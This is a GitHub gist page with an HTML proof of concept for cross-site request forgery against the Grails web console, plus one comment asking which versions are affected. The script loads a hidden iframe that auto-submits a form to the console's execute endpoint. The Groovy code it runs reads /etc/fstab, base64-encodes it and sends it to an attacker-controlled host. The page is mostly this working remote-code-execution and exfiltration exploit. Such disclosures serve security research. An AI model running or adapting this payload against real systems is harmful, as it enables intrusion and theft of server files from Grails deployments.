Skip to content

Instantly share code, notes, and snippets.

@berdario berdario/poc.html
Created Aug 8, 2016

Embed
What would you like to do?
Grails console CSRF proof of concept
<html>
<body>
<script>
consoleUrl = 'https://victim.example.com/path/to/console'
attackerHost = 'http://localhost:7979/'
code = `new URL('${attackerHost}'+new File('/etc/fstab').bytes.encodeBase64()).getText()`
code = `evaluate new String('${btoa(code)}'.decodeBase64())` // optional, useful to transmit the payload as a GET argument
function newFrame(content){
let frame = document.createElement('iframe')
frame.srcdoc = content
frame.style = 'visibility:hidden'
document.body.appendChild(frame)
}
rce = `
<html>
<body onload="document.getElementById('do_submit').click()">
<form id="f1" method="GET" action="${consoleUrl}/execute">
<input name="autoImportDomains" value="true">
<input name="code" value="${code}">
<input type="submit" id="do_submit">
</form>
</body>
</html>`
newFrame(rce)
</script>
</body>
</html>
@attritionorg

This comment has been minimized.

Copy link

attritionorg commented Aug 9, 2016

What version of Grails does this affect?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.